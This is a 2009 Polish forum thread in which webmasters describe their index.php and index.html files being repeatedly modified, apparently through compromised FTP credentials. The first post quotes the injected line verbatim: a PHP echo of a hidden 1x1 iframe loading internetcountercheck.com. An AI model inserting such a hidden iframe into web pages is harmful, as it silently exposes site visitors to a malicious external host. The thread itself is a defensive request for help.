Wirus? internetcountercheck.com Opcje

[MiFlo]

Witam, nie jestem pewien czy trafiłem na odpowiedni dział, w internecie nie znalazłem nic na ten temat więc postanowiłem napisać tu.

Mam problem z serwerem (najprawdopodobniej) mianowicie chodzi o to że automatycznie zmieniają mi się pliki o nazwach index.php i na końcu pliku dodawane jest

Kod

echo "<iframe src=\"http://internetcountercheck.com/?click=89144906\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

które to blokuje formularz POST i przeglądarka informuje o tym że witryna posiada złośliwe oprogramowanie.

Napisałem do administracji mojego serwera jednak oni twierdzą że serwer jest w 100% sprawny. Pozmieniałem hasła przeskanowałem własny komputer jednak to nic nie dało mimo tego że usuwam te wpisy one po jakimś czasie spowrotem się pokazują.
System operacyjny na serwerze to FreeBSD

Byłbym wdzięczny za wszelką pomoc

Pozdrawiam

[gciwo]

Mam to samo - nie jest to wina skryptu bo linijki dopisuje też do statycznych plików index.html.
Po usunięciu złośliwego kodu, ale nie zmieniając hasła w ftp, po kilku godzinach kod został znowu dodany - co ciekawe do kilkudziesięciu plików w tej samej minucie - za pierwszym razem ta "operacja" trwałą jakieś 2h.
Po zmianie hasła wszystko było OK. Wniosek jest tylko jeden.
Jeszcze czekam na logi do ftp.

Czy masz hosting w home?

Ten post edytował gciwo 1.02.2009, 18:22:27